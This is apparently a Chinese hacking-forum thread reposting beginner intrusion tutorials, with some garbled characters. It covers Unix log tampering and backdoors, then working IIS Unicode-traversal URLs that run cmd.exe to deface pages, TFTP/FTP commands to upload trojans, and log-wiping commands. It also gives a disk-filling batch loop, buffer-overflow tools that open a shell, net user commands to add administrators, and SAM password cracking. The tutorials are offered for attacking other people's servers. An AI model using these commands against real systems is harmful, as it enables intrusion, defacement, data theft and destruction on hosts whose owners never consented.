/Var/adm新一点的版本使用这个位置。  /Varflort一些版本的Solaris、 Linux BSD、 Free BSD使用这个位置。  /etc,大多数Unix版本把Utmp放在此处,一些Unix版本也把Wtmp放在这里,这也是Syslog.conf的位置。  下面的文件可能会根据你所在的目录不同而不同:  acct或pacct-一记录每个用户使用的命令记录。  accesslog主要用来服务器运行了NCSA HTTP服务器,这个记录文件会记录有什么站点连接过你的服务器。  aculo保存拨出去的Modems记录。  lastlog记录了最近的Login记录和每个用户的最初目的地,有时是最后不成功Login的记录。  loginlog一记录一些不正常的L0gin记录。  messages——记录输出到系统控制台的记录,另外的信息由Syslog来生成  security记录一些使用 UUCP系统企图进入限制范围的事例。  sulog记录使用su命令的记录。  utmp记录当前登录到系统中的所有用户,这个文件伴随着用户进入和离开系统而不断变化。  Utmpx,utmp的扩展。  wtmp记录用户登录和退出事件。  Syslog最重要的日志文件,使用syslogd守护程序来获得。  2.隐藏踪迹  攻击者在获得系统最高管理员权限之后就可以随意修改系统上的文件了(只对常规 Unix系统而言),包括日志文件,所以一般黑客想要隐藏自己的踪迹的话,就会对日志进行修改。最简单的方法当然就是删除日志文件了,但这样做虽然避免了系统管理员根据IP追踪到自己,但也明确无误地告诉了管理员,系统己经被人侵了。所以最常用的办法是只对日志文件中有关自己的那一部分做修改。关于修改方法的具体细节根据不同的想跳楼作系统有所区别,网络上有许多此类功能的程序,例如 zap、 wipe等,其主要做法就是清除 utmp、wtmp、Lastlog和 Pacct等日志文件中某一用户的信息,使得当使用w、who、last等命令查看日志文件时,隐藏掉此用户的信息。管理员想要避免日志系统被黑客修改,应该采取一定的措施,例如用打印机实时记录网络日志信息。但这样做也有弊端,黑客一旦了解到你的做法就会不停地向日志里写入无用的信息,使得打印机不停地打印日志,直到所有的纸用光为止。所以比较好的避免日志被修改的办法是把所有日志文件发送到一台比较安全的主机上,即使用loghost。即使是这样也不能完全避免日志被修改的可能性,因为黑客既然能攻入这台主机,也很可能攻入loghost。  只修改日志是不够的,因为百密必有一漏,即使自认为修改了所有的日志,仍然会留下一些蛛丝马迹的。例如安装了某些后门程序,运行后也可能被管理员发现。所以,黑客高手可以通过替换一些系统程序的方法来进一步隐藏踪迹。这种用来替换正常系统程序的黑客程序叫做rootkit,这类程序在一些黑客网站可以找到,比较常见的有LinuxRootKit,现在已经发展到了5.0版本了。它可以替换系统的ls、ps、netstat、inetd等等一系列重要的系统程序,当替换了ls后,就可以隐藏指定的文件,使得管理员在使用ls命令时无法看到这些文件,从而达到隐藏自己的目的。  3.后门   一般黑客都会在攻入系统后不只一次地进入该系统。为了下次再进入系统时方便一点,黑客会留下一个后门,特洛伊木马就是后门的最好范例。Unix中留后门的方法有很多种,下面介绍几种常见的后门,供网络管理员参考防范。  密码破解后门  这是入侵者使用的最早也是最老的方法,它不仅可以获得对Unix机器的访问,而且可以通过破解密码制造后门。这就是破解口令薄弱的帐号。以后即使管理员封了入侵者的当前帐号,这些新的帐号仍然可能是重新侵入的后门。多数情况下,入侵者寻找口令薄弱的未使用帐号,然后将口令改的难些。当管理员寻找口令薄弱的帐号是,也不会发现这些密码已修改的帐号。因而管理员很难确定查封哪个帐号。  Rhosts + + 后门  在连网的Unix机器中,象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简单的认证方法。用户可以轻易的改变设置而不需口令就能进入。 入侵者只要向可以访问的某用户的rhosts文件中输入"+ +",就可以允许任何人从任何地方无须口令便能进 入这个帐号。特别当home目录通过NFS向外共享时,入侵者更热中于此。这些帐号也成了入侵者再次侵入的后门。许多人更喜欢使用Rsh,因为它通常缺少日志能力. 许多管理员经常检查 "+ +",所以入侵者实际上多设置来自网上的另一个帐号的主机名和 用户名,从而不易被发现。  校验和及时间戳后门  早期,许多入侵者用自己的trojan程序替代二进制文件。系统管理员便依靠时间戳和系统校验和的程序辨别一个二进制文件是否已被改变,如Unix里的sum程序。入侵者又发展了使trojan文件和原文件时间戳同步的新技术。它是这样实现的: 先将系统时钟拨 回到原文件时间,然后调整trojan文件的时间为系统时间。一旦二进制trojan文件与原来的精确同步,就可以把系统时间设回当前时间。Sum程序是基于CRC校验,很容易骗过。入侵者设计出了可以将trojan的校验和调整到原文件的校验和的程序。MD5是被 大多数人推荐的,MD5使用的算法目前还没人能骗过。
在线时间小时
电魂*威望*好评0信誉2爱心76
Login后门  在Unix里,login程序通常用来对telnet来的用户进行口令验证. 入侵者获取login.c的原代码并修改,使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门口令,它将忽视管理员设置的口令让你长驱直入。这将允许入侵者进入任何帐号,甚至是root。由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问的,所以入侵者可以登录获取shell却不会暴露该帐号。管理员注意到这种后门后,便 用"strings"命令搜索login程序以寻找文本信息. 许多情况下后门口令会原形毕露。入侵者就开始加密或者更好的隐藏口令,使strings命令失效Telnetd后门  当用户telnet到系统,监听端口的inetd服务接受连接随后递给in.telnetd,由它运行 login.一些入侵者知道管理员会检查login是否被修改,就着手修改in.telnetd. 在in.telnetd内部有一些对用户信息的检验,比如用户使用了何种终端. 典型的终端设置是Xterm或者VT100.入侵者可以做这样的后门,当终端设置为"letmein"时产生一 个不要任何验证的shell. 入侵者已对某些服务作了后门,对来自特定源端口的连接产 生一个shell。  服务后门  几乎所有网络服务曾被入侵者作过后门. Finger,rsh,rexec,rlogin,ftp,甚至 inetd等等的作了的版本随处多是。有的只是连接到某个TCP端口的shell,通过后门口令就能获取访问。这些程序有时用刺娲□?Ucp这样不用的服务,或者被加入inetd.conf 作为一个新的服务,管理员应该非常注意那些服务正在运行,并用MD5对原服务程序做校验。  Cronjob后门  Unix上的Cronjob可以按时间表调度特定程序的运行。入侵者可以加入后门shell程序 使它在1AM到2AM之间运行,那么每晚有一个小时可以获得访问。也可以查看cronjob中 经常运行的合法程序,同时置入后门。  库后门  几乎所有的UNIX系统使用共享库,共享库用于相同函数的重用而减少代码长度。一些入侵者在象crypt.c和_crypt.c这些函数里作了后门;象login.c这样的程序调用了 crypt()。当使用后门口令时产生一个shell。因此,即使管理员用MD5检查login程序,仍然能产生一个后门函数,而且许多管理员并不会检查库是否被做了后门。对于许多入侵者来说有一个问题: 一些管理员对所有东西多作了MD5校验,有一种办法是入侵者对open()和文件访问函数做后门。后门函数读原文件但执行trojan后门程序。所以当MD5读这些文件时,校验和一切正常,但当系统运行时将执行trojan版本的,即使trojan库本身也可躲过MD5校验,对于管理员来说有一种方法可以找到后门,就是静态编连MD5校验程序然后运行,静态连接程序不会使用trojan共享库。  内核后门  内核是Unix工作的核心,用于库躲过MD5校验的方法同样适用于内核级别,甚至连静态 连接多不能识别. 一个后门作的很好的内核是最难被管理员查找的,所幸的是内核的 后门程序还不是随手可得,每人知道它事实上传播有多广。 文件系统后门  入侵者需要在服务器上存储他们的掠夺品或数据,并不能被管理员发现,入侵者的文章常是包括exploit脚本工具,后门集,sniffer日志, email的备分,原代码,等等!有时为了防止管理员发现这么大的文件,入侵者需要修补"ls","du","fsck"以隐匿特定的目录和文件,在很低的级别,入侵者做这样的漏洞: 以专有的格式在硬盘上割出一部分,且表示为坏的扇区。因此入侵者只能用特别的工具访问这些隐藏的文件,对于普通的管理员来说,很难发现这些"坏扇区"里的文件系统,而它又确实存在。  Boot块后门  在PC世界里,许多病毒藏匿与根区,而杀病毒软件就是检查根区是否被改变。Unix下,多数管理员没有检查根区的软件,所以一些入侵者将一些后门留在根区。. 所以更多的管理员是 用MD5校验和检测这种后门的。隐匿进程后门  入侵者通常想隐匿他们运行的程序,这样的程序一般是口令破解程序和监听程序 (sniffer),有许多办法可以实现,这里是较通用的: 编写程序时修改自己的argv[] 使它看起来象其他进程名。可以将sniffer程序改名类似in.syslog再执行,因此当管理员用"ps"检查运行进程时,出现 的是标准服务名。可以修改库函数致使 "ps"不能显示所有进程,可以将一个后门或程序嵌入中断驱动程序使它不会在进程表显现。  TCP Shell 后门  入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCP Shell后门. 许多情况下,他们用口令进行保护以免管理员连接上后立即看到是shell访问. 管理员可以用netstat 命令查看当前的连接状态,那些端口在侦听,目前连接的来龙去脉. 通常这些后门可 以让入侵者躲过TCP Wrapper技术. 这些后门可以放在SMTP端口,许多防火墙允许 e-mail通行的.  UDP Shell 后门  管理员经常注意TCP连接并观察其怪异情况,而UDP Shell后门没有这样的连接,所以 netstat不能显示入侵者的访问痕迹,许多防火墙设置成允许类似DNS的UDP报文的通行,通常入侵者将UDP Shell放置在这个端口,允许穿越防火墙。  ICMP Shell 后门  Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一。许多防火墙允许外界ping它内部的机器,入侵者可以放数据入Ping的 ICMP包,在ping的机器间形成一个shell通道,管理员也许会注意到Ping包暴风,但除了他查看包内数据,否者入侵者不会暴露。  加密连接  管理员可能建立一个sniffer试图某个访问的数据,但当入侵者给网络通行后门加密 后,就不可能被判定两台机器间的传输内容了。
在线时间小时
电魂*威望*好评0信誉2爱心76
基础知识(1)我认为这是一套适合初学者由浅到深的文章,所以强烈推荐给大家,作者从基础讲到最近比较火的漏洞,可能有些人看来是浅了些,但是的确很适合想干点啥但又不知道怎么办的菜鸟们 。第一节,伸展运动。这节想跳楼我们要准备道具,俗话说:“工欲善其事,必先利其器”(是这样吗?哎!文化低……)说得有道理,我们要学习黑客技术,一点必要的工具必不可少。1,一台属于自己的可以上网的电脑。这样你可以有充分的支配权,上网不用说,否则你怎么看到我的文章?wap?呵呵!属于自己很重要,否则安全性是个很大的问题。第一点相信大家没有问题。2,windows2000/nt,别和我说98/me,他们是你们同学用来玩游戏的!(当然,我也是铁杆game fan)对网络支持极差,命令受限制,很多软件又不能用,对黑客来说使用起来绊手绊脚,非常不利。这里我推荐2000,这是一个很成熟的系统(漏洞还是有一堆)。推荐双系统,这样黑玩搭配,干活不累。3,冰河。中国第一木马,中者数不胜数,国人骄傲。虽然用冰河根本不能算黑客,但它确实能培养你对黑客的兴趣,同时帮助你了解网络,相信很多黑客同学都是这样起步的。静止写的那篇冰河教程很不错,大家仔细看看。而且,以后你学会入侵服务器后,用冰河想跳楼作也会减少工作量(我是懒虫,爽!)4,oicq。我们学黑客,可不是学泡mm!bfctx你………… 息怒息怒!我们当然是学黑客,但不要忘了,众人拾柴火更高,我们通过cshu的成员列表,互相联系帮助,对提高水平很有帮助!另外我要废话一句:据我了解,现在黑客网站下载最多的都是针对oicq的破解工具,我个人认为很无聊,偷个密码代表什么,浪费时间!最后补充:mm不能不泡。(谁砸我??!!)5,superscan。很好用的端口扫描器,速度超快,功能一流,一旦拥有,别无所求……(打住!)不论是找木马受害者,还是扫服务器端口,它都非常有效,cshu强烈推荐!6,一本笔记本/便条,网上资料相当多,黑客处理的也是非常之多。良好的习惯决定了你的效率,准备一本笔记本,记录下你的成果,肉鸡,木马利用,命令,密码……坚持一下,你会发现你的效率大幅上升的!7,lc3.著名nt/2000sam破解程序,有时我们拿不到足够权限,又没好办法,那么lc3是最好的解决办法,只要你拿的到sam,你就是服务器它爷爷!本站有其破解程序,支持了暴力破解!8,程序合并。这是玩木马必需的,虽然木马是很低的手段,但有时配合巧办法(以后我会介绍)确实能够达到意想不到的效果,朋友们可以在空闲时玩玩木马,很有趣,若你能巧妙的骗过mm,那么webmaster也可能被你骗倒:〉 (比较理想化)9,流光4for 2000/nt。可能是世界上最好的综合类黑软!中国的骄傲,它集成了很全的漏洞信息,速度快,方法多,对有漏洞的主机是毁灭性的打击,想跳楼作又方便,是快速黑站必不可少的精品工具。超级吐血推荐!!10,良好的心态,稳定的情绪,刻苦钻研的精神,刨根问底的作风,打扫房间的习惯。黑客是门很高深的学问,不要幻想一步登天,失败是常有的事,千万不可灰心。在那么多黑软的包围下,切不可完全依赖他们,一定要了解它们利用什么原理工作。对任何一个小问题,小细节,一定要问清楚,cshu就是给大家互相交流的场所哦!黑完后不要得意忘形,打扫战场也很重要,以防万一。第一节想跳楼完,可能很无聊,我就这点水平,大家见谅!这里我说一句大话:做完菜鸟想跳楼,包你会黑简单的站(哎哟!心慌了!)下一节想跳楼我们要介绍如何掌握一台主机的基本信息,期待中……真是太对不起大家了,隔了那么久才写这篇教程,我这几天实在太忙,大家还是体谅一下我吧,好了,开始做想跳楼。今天的内容是获得主机的信息。 我们要黑一台主机,首先要了解它的信息,包括它的类型,用户列表,目录,端口,漏洞等等。首先我们我们要找一台主机来练手,随便挑吧!(乱说的)第一部,呵呵,先在ie里看看吧,mmmm.....做的还行,挺精致的!主要是我们肯定了它现在是正常的。 然后,我们应该知道它的ip,很简单,ping它一下就可以了。ping ,看看窗口里有了什么?是不是有三行回应,其中的111.111.222.222就是ip了(还是胡说的,一个例子)。有人是不是要问,我这里怎么没有。那可能是两个原因,第一,你打错命令了;第二,该主机装了防火墙,禁止ping,不过这种可能很小。知道了ip,下一步应该确定端口了。下面是一些常用的端口的默认值21--ftp 重要哦23--telnet 欢呼吧25-smtp 尽管重要,但似乎没什么可利用的53--domain 同上79--finger 可知道用户信息了80--http 要看网页,没它不行吧110--pop 收信的139--netbios 共享用的,很有利用价值哦3389--win2000超级终端 呵呵,这个好!其实端口有上千种,这些最最常用我们怎么知道服务器有什么端口打开呢??去找个扫描器吧,x-scan ,super scan,flux等等很多哦。这里我推荐super scan ,速度很快,本站也有其教程哦!用法还是比较傻瓜的,估计大家不会有问题,轻轻几点,打开的端口就出现了。不错不错,上面说到的都有(太理想化了吧!)那么我们该如何应对呢?ps:忘了说一声,顺便扫一下7626,冰河有也说不准哦:)若有ftp,那就用用匿名登陆。自己动手也行,最好用x-scan flux等吧!反正,有ftp就有一份希望telnet在!好!telnet 111.111.222.222,出现窗口了吧!嗯?要密码?看来网管还不是超级注意文明用语:)随便猜个,错了,闪人!smtp,看着它,无奈domain,一般它带了局域网了finger 可以知道用户列表了,不好,忘了用法了,幸好finger很少出现80肯定在,我们等会来对付它110 有smtp,pop在也不奇怪了139 找个扫描器来找找有没有露在外面的共享吧,日后也用得着3389 太太太好了!!打开客户端吧,用输入法漏洞试试,成了就干了它!不成也没事,我们以后完全控制它3389会很方便的。端口扫完了!我们在多了解它一点吧!追捕大家都知道吧,其实用它获取主机信息也不赖哦。打开追捕,输入ip,选择智能追捕,是不是有很多信息出来了?虽然不能直接利用,但毕竟我们有对它有了进一步的了解。掌握了那么多信息,我们该做点什么了,一般黑客入侵都是靠着系统漏洞,不会都傻傻地去暴力破解的。我们现在就要看看它有什么漏洞。对漏洞大家可能不太了解,我这里也不能一一说明了,太多了,感兴趣的话去论坛找freedom吧!目前广泛利用和存在的漏洞有:unicode,unicode后续,iis溢出,.idq,.frontpage extend,输入法漏洞等等大漏洞。 至于如何确定,呵呵,绝对不会是一行一行地在ie中试吧,拿出x-scan吧,很好的扫描器哦!稍微设置一下就上路吧!过了一会,呵呵,报告出来了,快看,哇!漏洞一大堆!这下赚了!各条漏洞都有详细的信息,大家看吧,总比我说的准了。
在线时间小时
电魂*威望*好评0信誉2爱心76
基础知识(2)二,一切从基础开始由于winnt\system32\cmd.exe的存在,使远程执行命令变为可能,在浏览器里输入以下请求:(假设11.11.22.22有漏洞)11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir学过dos的应该可以看懂,其实就是利用当中的非法请求使我们可以连到system32下,如果inetpub\目录不合winnt同盘,或者目录级数有改动,可能会引起请求失败。如果成功,那么在浏览区可看到如下信息:Directory of C:\inetpub\scripts 15:49 〈DIR〉 . 15:49 〈DIR〉 .. (假设目录中没有文件,实际上有一大堆)是不是有自己机器的感觉了,正点!就是这种感觉!cmd.exe相当与dos里的,因此,我们可以执行很多命令了! ... em32/cmd.exe?/c+dir (这个命令同样道理)大家请注意:/c后面的+,实际上,他就是空格,请记牢!dir开始就是dos命令了,我们可以更改一下:11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\winnt\auto.exe会dos的朋友一定懂其意义了,不懂的请去看书 .不用说,大家也知道我们就可以利用它来对有漏洞的机器展开攻击了!三,实战演练1,修改主页!(是不是很爽?)一般主页位置在c:\inetpub\wwwroot下,但要是改了路径,就需要找找了。最方便的方法:在浏览器里输入 要是有漏洞,那在浏?..皇俏颐堑氖籽 ?/a>分析法:用dir看各个盘符的根目录,看可疑的就进去看,运气好的在一分钟里找到,这要看运气和直觉。dir/s法:首先在看其主页,找个图片或连接,看它的文件名,比如,11.11.22.22首页上有一幅图片,右击,属性,看到了吗? iloveu.gif,然后我们利用unicode输入这条命令dir c:\iloveu.gif /s意味着查找c盘下所有目录里的iloveu.gif,注意实际应用时别忘了把空格改为+,如果没有继续找d盘,很快就能确定主页目录的。找到了目录,就要对它开刀了!一般默认收页为index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中的一个,现在我们确定11.11.22.22中为index.htm那么我们就修改它吧!最方便的方法:echo法。echo是一个系统命令,主要用于设置回应开关,而echo cshu >c:\autoexe.bat就是把cshu加入autoexec.bat里并删除原有内容,echo cshunice >>c:\autoexec.bat就是加入cshunice但不删除原有内容,这样我们就可以逍遥的改了。11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm回应为:HTTP 500 - 内部服务器错误通过对cmd的分析,袁哥得出一条简便的方法,加入"符号11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+2001730+>>c:\inetpub\wwwroot\index.htm回应为:cgi错误,不用理会两条命令一下,呵呵,再看看11.11.22.22,是不是烙上我们的大名了?不错吧而在实际想跳楼作中,可能袁哥的方法也会失效,这时,我们就可以copy cmd.exe 为另一个exe,记住路径,用copy后的来echo例如:11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\a.exe11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm2,上传法:echo有点不讲道理,把人家的文件破坏了,要是想在主页上增光添彩,那就应该用改好的主页
在线时间小时
电魂*威望*好评0信誉2爱心76
基础知识(3)上传,这个我们后面介绍。几点忠告:1,对于没有主页的机器(就是正在建立的主页),不要改它,这很没水准,也很没道德2,echo前记得帮他们做好备份3,不准在主页里加入恶性语句2,下载文件要是有什么有用的文件被你发现,那我们如何下载呢?最简单的方法:把文件copy至网页目录下。copy c:\email\baby.eml c:\inetpub\wwwroot\baby.zip,然后,下载11.11.22.22/baby.zip就行了,注意!实际应用中要记得对文件名进行修改,总之不能暴露。别的方法:对不起,没想好:)3,最重要的上传一般方法:ftp法首先建一个ftp脚本文件:c:\hehe.haha(名字乱取把),申请一个ftp账号,然后用echo吧echo+open (ftp主机) > c:\hehe.hahaecho+user yourname >> cc:\hehe.haha (yourname是用户名)echo+yourpasswd >> c:\hehe.haha (yourpasswd是密码)echo+get setup.exe >> c:\hehe.haha 要下载的文件echo+quit >> c:\hehe.haha完了以后:ftp+/s:c:\hehe.haha,由于是ftp主机,那么速度一定很快,过一会setup.exe就会出现在当前目录了(也就是cmd所在目录)别忘了先上传到ftp主机,不要做马大哈哦!最简单的方法:tftp法。这种方法不用中转服务器,首先准备一个tftp服务端,它的作用就是把你的机器做成一个tftp服务器,利用漏洞机器来下载(注意,运行tftp时不要运行其他的ftp软件)在这里我推荐cisco tftp server,自己去找找把,实在没有来找我:)安装好后运行,别忘了设置好默认目录,否则会找不到文件tftp命令:tftp -i 1.2.3.4 GET ihateu.exe c:\winnt\ihateu.exe(ihateu.exe在默认目录里)1.2.3.4为你的ip,用unicode运行一下,会看到tftp server里有反应了,这就好了,不一会,文件就传上去了,方便把!学会了上传,我们就可以好好改主页,还可以上传木马,还可以把程序放上去运行…………(运行程序和在dos里一样)4,如何清除痕迹虽然国内主机纪录ip的不是很多,但万事小心为妙,unicode权限达不到admin。用cleaniislog行不通,就…………直接删吧!C:\winnt\system32\logfiles\*.*C:\winnt\ssytem32\config\*.evtC:\winnt\system32\dtclog\*.*C:\winnt\system32\*.logC:\winnt\system32\*.txtC:\winnt\*.txtC:\winnt\*.log全……擦掉!四,细节问题。1,遇到长文件名怎么办?c:\program files\就用c:\"program20%files"\2,遇到空格怎么办?%代替喽,或者xx yy=xxyy~1基础知识(5)%代替喽,或者xx yy=xxyy~13,如何做个很大的文件?目的就是破坏啦!我不喜欢不过教教你们啦@echo offecho big > c:\a.a:hcopy c:\a.a+c:\a.a c:\a.agoto h注意不要乱来啊!4,输入命令,没反应或反应不对。:)请检查检查再检查命令的正确性,可能没有漏洞,那就闪人!看在你看到这里那么给我面子的份上,在给你几个吧! .....&A&../winnt/system32/cmd.exe?/c+dir+c :\ 或
... 2/cmd.exe?/c+dir+c:\ 或
... 2/cmd.exe?/c+dir+c:\ 或
... 2/cmd.exe?/c+dir+c:\不一定有用哦!5,如何找到unicode漏洞的主机呵呵:)最好的方法自然是………………一个一个ping,一个一个试喽:)不要打我呀!我说我说。最好找一个cgi扫描器,unicode查找器多如牛*,随便找个吧!6,我copy,del文件,怎么显示aceess denined?这个不好办了,由于unicode所拥有的权限有限,出现上述情况很正常,我们要做的便是提高自己的权限!这个我会在今后介绍,现在你可以试试attribattrib -r -h -s c:\autoexec.bat再对autoexec.bat进行想跳楼作,看看有没有效果,成功率不高,不好意思!7,我黑了主页,天下无敌?我本来想对你说:“见你的鬼去吧!”不过想想不大礼貌,有失我绅士风度,所以改个口echo主页或改主页在不懂黑客的人看起来很了不起,不过,它最多算是一个基础,拿到admin才是我们的终极目标!对cshu全体成员来说,不准去改正在建立的网页!这是我们的原则!要是你想耍耍威风,那也可以理解,那就去黑外国的,或者url欺骗也是个好选择8,我如何做更多的事?第一,努力提高权限第二,由于cmd的限制,我们可以做的不多,那就要程序帮忙,上传吧!切记,要隐秘!一,frontpage扩展攻击。为什么把它放第一位呢?原因很简单,它最最方便,frontpage服务器扩展是一种方便的远程站点管理功能,可是由于某些网管注意文明用语的疏忽(为什么注意文明用语满街飞?)不设置访问密码,如果那样的话,我们只要用一个frontpage就可以黑它了!!这完全不是黑客工具,但它确实办到了,还要感谢注意文明用语网管和微软啊!具体做法:1,准备frontpage,我是用dreamweaver的,但它不能黑啊:)最好是2000版,只是不要是老掉牙的版本就行了。2,找一台有frontpage扩展的主机,可以用流光,也可以用搜索引擎查找/_vti_pvt/,这是frontpage扩展的标志。3,接下来打开frontpage,(妈妈:你在干什么?回答:做网页!妈妈:好孩子!)文件菜单下选择“打开站点”,然后在文件夹框里写入 (我习惯用这个做例子,以...僮魍?页文件了??/a>4,万一跳出错误信息,表示有密码(这个不算注意文明用语)这时我们试着用以下url, ,我的看法:这个漏洞只能说明网管的疏忽,对我们而言是没有什么利用价值的,只可以改改网页,也许这也够了,但要进一步控制主机,此漏洞就无能为力。消遣时可以玩玩。二,iis.printer溢出攻击据说缓冲区溢出攻击是黑客入侵时70%所选的方法,看起来有点夸张,但确实有道理,因为暴力密码破解在网络上变得非常之慢,而像unicode的解码漏洞所取得的权限又太低,而缓冲区溢出一般可取得system权限,是非常有用的!具体原理我也不是很清楚,只能说个大概:当我们向系统发出超出缓冲区大小的数据处理请求时,便会引发溢出,并弹出错误对话框,我们常看到的“非法想跳楼作”其实也是可能是由于溢出。而当溢出时,eip发生错误,有汇编知识的朋友应该记得,eip是控制执行代码的位置(顺便问一下,有没有会crack的高人,记得做我老师)这时加入一段恶性代码,算好发生溢出时的eip值,这样溢出时就会执行恶性代码而不是当掉。非法想跳楼作我们知道多的不得了,因此…… 溢出攻击是非常强大的!由于汇编对于我们来说较难掌握,加之对溢出的了解很有限,那么我们只能借助高手们的程序来黑了。具体方法:1,准备iishack,本站有下载,该版本可以对多种系统进行攻击。2,用x-scan或流光扫描一个有iis.printer漏洞的主机,然后就可以攻击了。3,在命令行方式执行iis5hack (主机ip) (端口号,默认80)(系统代号,具体可参考程序的说明) ( shell口)例如:iis5hack 11.11.22.22 80 1 111(以为在111端口开一个shell)4,用nc或telnet连上,nc/telnet 11.11.22.22 111,成功的话就可以控制机器了,加个用户,做个代理……我的看法:这算是一个比较有用的漏洞了,它能帮助我们取得system权限,其实和admin差不了多少了,对于做一台跳板是非常有利的,希望大家熟练掌握。三,idq/ida漏洞溢出攻击这是时下很热门的了,原理和上面的printer相似,目前我只找到了iis5的攻击程序,在cshu里也可以找到的,我们准备的是snake的gui版本,很方便的。具体方法:1,准备snakeiis溢出程序。可以从本站下载。2,ida/idq漏洞很多的,但win2k的服务器就不是那么普遍了,所以用你熟练的扫描器去找一打win2k的机器吧。3,程序的界面是很傻瓜的,把ip填入,选择好类型,按下溢出按钮,显示shellcode发送完毕。4,telnet/nc到你设定好的端口,如果成功的话,会显示目录下的信息(因为默认shellcode是dir)5,欢呼吧!再次溢出,别忘了改shellcode为你想要的代码哦。6,重复4,很快一台新鲜的win2k被你控制了!我的看法:我很喜欢用这种攻击,因为win2k的3389可以很方便的为我做事,省力地搞到一台win2k,然后慢慢享用,爽到根尖细胞啊!大家应该掌握这项方法。四,*bsd telnetd溢出攻击又是溢出,不过这个可是真正的热点哦,最近红盟等大型安全网站被黑就是因为这个!所以看看吧具体方法:1,使用fbsdhack for win2k来攻击,本站有下载的2,还是要找到这样的主机,一般是xnix的,比较少的,用专门的扫描器吧,我会在不久放出来。3,等吧!这个漏洞要发送的信息很大,大约16mb,可怕吧,所以最好用高速肉鸡4,有幸成功了,记得请我吃饭!我的看法:这个漏洞的利用比较有难度,从找机器开始就是。但作为黑客爱好者,我们没有理由去回避它!五,密码暴力破解这是最最原始,也是最最基本的攻击的方式了,利用字典文件或暴力模式,对密码进行探测。费时费力,但若有经验的话,可以缩短这一过程。具体方法:1,找一个破解器,有ftp,http,smtp,pop3,telnet等等类型。2,找到一台相应的主机。3,设定一番,上路吧!你可以睡觉,可以去machine(就是做作业),可以去泡妞……就是不要傻等。为什么呢?因为会伤视力的:)怎么倒了一片,起来起来!4,万一成功了(之所以用这个词,是因为成功率很低的)表明你运气旺,赶紧下线,买彩票去吧大家好,这几天被cgi程序搞得头昏脑胀,主要还是51的错,什么破东西,那么多错误!现在只好暂时借人家的地方用。这是菜鸟想跳楼的最后第二节,说实话我还可以写很多的,但是作业还欠了一大堆:(为什么我没有满舟的狗屎运?算了算了,我不合那种欺世盗名之辈一般见识,开始做想跳楼吧!不知道大家对unicode和溢出攻击是不是熟练了?没有的要加油哦!今天我们来谈谈权限的提升。在windows系统中,最高的权限掌握在administrators的手里,在xnix中称为root,我们要完全掌握一台机器,拿到admin是不可或缺的。首先说说最简单的:system to admin当我们用溢出攻击成功后,其实我们已经拿到了system权限(具体看每种攻击而可能有所不同)这时我们很容易拿到admin权限。首先看看一下命令:net user 察看用户表 net user username pass /add(添加密码为pass的用户username)net localgroup 察看组 net localgroup guests cshu /add 把cshu用户加入guests组net use \\ip\ipc$ "password" /user:username 这是远程连接的命令假如我们溢出了11.11.22.22,那么这样做吧!net user (看到了iusr_machinename的用户了,它一般没什么权限的)
在线时间小时
电魂*威望*好评0信誉2爱心76
基础知识(4)net user iusr_machinename cshu (把它的密码设为cshu)net localgroup administrators iusr_machinename /add(加入administrators组)这样我们就拥有了iusr_machinename这一账号,admin权限,简单吧!熟悉一下net use 命令:net use \\11.11.22.22\ipc$ "cshu" /user:iusr_machinename 建立连接copy c:\haha.exe \\11.11.22.22\admin$ 把haha.exe 复制到机器c:\winnt\system32上,若是c$.d$,就表示c,d盘net time \\11.11.22.22 看到了时间了,比如是8点at \\11.11.22.22 8:03 haha.exe 就会在8点3分执行。net use \\11.11.22.22 /delete 断开连接应该是很简单的。这样我们就可以随心所欲地想跳楼作11.11.22.22了,admin是最高权限,所以没有限制的:)是不是很简单?所以我是溢出是很厉害的攻击方法。3389知道吧!如果能进入,那么用上面的命令也可以轻易拿到admin的,不过呢,有3389漏洞的机器已经不多了。看你运气了!(本站有几篇关于3389的好文章)总的来说,还是unicode的机器最多,为什么注意文明用语网管不会灭绝呢:)虽然unicode拿admin有一定难度,但还是要试试的。首先,我们检查一下unicode在这台机器上的权限,一般看读写权限和运行权限。用copy 或del命令便可确定读写权限,然后上传文件运行一下便可知道运行权限。1,如果我们可以对winnt\repair和winnt\config进行访问,sam文件就在里面(win2k里是sam,nt4里是sam._)那么用tftp 把get改成put下载下来,或者把它复制到inetpub\wwwroot下,改成zip下载。拿到sam后,用lc3破解版暴力破解吧,这种方法比较费时。2,要是有运行权限,拿就抛个木马上去吧!虽说木马可能也会没有权限,但自启动的模式在admin登陆后可能会自己提升了权限。要注意的是,最好放最新的木马,因为木马很容易被杀毒软件查杀!3,其实和2差不多,只不过变成了键盘记录器,选个国产的,一般杀毒软件不会杀出来,认真配置好后传上去,下线睡觉或是做家务去!等到网管用了机器,密码就会被纪录下来,我们在去取,admin就顺利到手了:)4,getadmin和pipeupadmin,前者是nt4用的,后者是2000。看看帮助知道使用方法后(其实猜都猜得到)就可以提升一个用户的权限,有一步登天的感觉!5,手工做个bat文件,里面是建立用户等命令,然后把它放到自启动下,有很多途径:documents and 